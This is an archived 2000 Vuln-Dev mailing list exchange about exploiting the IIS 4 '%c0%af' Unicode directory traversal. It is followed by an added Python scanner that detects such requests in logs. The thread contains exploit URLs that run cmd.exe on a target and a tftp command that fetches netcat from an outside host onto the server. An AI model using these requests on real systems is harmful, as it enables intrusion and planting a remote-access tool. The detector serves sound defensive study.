Vulnerability Development mailing list archives

Re: dos commands via iis 4 (TFTP)


From: "Loschiavo, Dave" <DLoschiavo () FRCC CC CA US>
Date: Fri, 10 Nov 2000 11:16:25 -0800

Thanks, looks like I inadvertently left the "get" out of the message. I was
including that in the URL when testing. However, what I did notice was the
use of the quotes in the "-i" area of the URL. I was not using quotes. Will
have to give that a shot.

-thanks

-----Original Message-----
From: Robert A. Seace
To: DLoschiavo () frcc cc ca us
Cc: VULN-DEV () SECURITYFOCUS COM
Sent: 11/10/00 10:11 AM
Subject: Re: dos commands via iis 4 (TFTP)

In the profound words of Loschiavo, Dave:

I tried tftp commands in the URL, formatted like this:

http://192/168.1.250/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/tftp+-i+192.168.1.20+nc.exe"

and got nowhere, while this:

http://192.168.1.250/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:

gave me a listing of the c: drive.

Am I formatting the "TFTP" URL incorrectly?

        Yeah, I think so...  But, I'm no TFTP guru, either...
Personally, I would just use RCP...

        However, looking at the original advisory on BugTraq, that
mentioned using TFTP ("http://www.securityfocus.com/archive/1/141048"),
I think you need a "GET" before the "nc.exe", and maybe a destination
location specified after it, for where to place it on the NT box...
For instance, it shows an URL of:

/[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"+xxx.xxx.xxx.xxx+GET+ncx99.exe+c:\winnt\system32\ncx99.exe
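The requests above work because "%c0%af" is an overlong UTF-8 encoding of "/" that a naive traversal filter does not recognise before the web server decodes it. The following detector is an added example for defenders, not code from this thread or from the original BugTraq advisory: it percent-decodes a request path, decodes UTF-8 leniently so that overlong forms (2-, 3- and 4-byte) are still recovered and counted, and then looks for ".." traversal and system executables in the canonical path. The log format (client, method, raw URI) and the log lines are constructed for the example; real IIS logs differ.

```python
"""Flag overlong-UTF-8 directory traversal (the %c0%af trick) in request URIs.

Added defensive example; the log format and sample lines are constructed.
"""
import re
from urllib.parse import unquote_to_bytes

# Constructed log lines: "<client> <method> <raw-uri>" (hypothetical format).
SAMPLE_LOG = """\
192.168.1.20 GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
192.168.1.20 GET /msadc/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:
10.0.0.5 GET /msadc/msadcs.dll
10.0.0.7 GET /docs/caf%C3%A9.html
10.0.0.9 GET /images/../index.html
"""

TRAVERSAL = re.compile(r"(^|[/\\])\.\.([/\\]|$)")
SENSITIVE_EXE = re.compile(r"(cmd|tftp|rcp)\.exe", re.IGNORECASE)


def decode_lenient_utf8(raw: bytes):
    """Decode UTF-8 but accept overlong sequences instead of rejecting them.

    Returns (text, overlong_count). A strict decoder (Python's default) raises
    on %c0%af; a server that quietly maps it to '/' is exactly what this
    detector has to emulate to see the path the server saw.
    """
    out, overlong, i, n = [], 0, 0, len(raw)
    while i < n:
        b = raw[i]
        if b < 0x80:                       # plain ASCII
            out.append(chr(b))
            i += 1
            continue
        if 0xC0 <= b <= 0xDF:
            need, cp, minimum = 1, b & 0x1F, 0x80
        elif 0xE0 <= b <= 0xEF:
            need, cp, minimum = 2, b & 0x0F, 0x800
        elif 0xF0 <= b <= 0xF7:
            need, cp, minimum = 3, b & 0x07, 0x10000
        else:                              # stray continuation / invalid lead byte
            out.append("\ufffd")
            i += 1
            continue
        tail = raw[i + 1:i + 1 + need]
        if len(tail) != need or any(not (0x80 <= t <= 0xBF) for t in tail):
            out.append("\ufffd")
            i += 1
            continue
        for t in tail:
            cp = (cp << 6) | (t & 0x3F)
        if cp < minimum:                   # shorter encoding existed: overlong
            overlong += 1
        out.append(chr(cp) if cp <= 0x10FFFF else "\ufffd")
        i += 1 + need
    return "".join(out), overlong


def analyze_uri(raw_uri: str) -> dict:
    """Canonicalise the path of a raw request URI and report traversal indicators."""
    path, _, _query = raw_uri.partition("?")
    decoded, overlong = decode_lenient_utf8(unquote_to_bytes(path))
    return {
        "decoded_path": decoded,
        "overlong": overlong,
        "traversal": TRAVERSAL.search(decoded) is not None,
        "executable": SENSITIVE_EXE.search(decoded) is not None,
    }


def classify(info: dict) -> str:
    """Encoded traversal is the high-confidence signal; either alone is worth a look."""
    if info["traversal"] and info["overlong"]:
        return "high"
    if info["traversal"] or info["overlong"]:
        return "medium"
    return "none"


def scan_log(text: str) -> list:
    """Return one finding per suspicious line: client, severity, canonical path."""
    findings = []
    for line in text.splitlines():
        parts = line.split(maxsplit=2)
        if len(parts) != 3:
            continue
        client, _method, uri = parts
        info = analyze_uri(uri)
        severity = classify(info)
        if severity != "none":
            findings.append({"client": client, "severity": severity,
                             "path": info["decoded_path"],
                             "executable": info["executable"]})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['client']:14} {f['path']}")
```

The point of decoding leniently is that the check must run on the path the server will actually resolve; the original flaw was a traversal check applied before the overlong bytes were turned into a slash, so a filter matching only the literal "../" saw nothing wrong.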

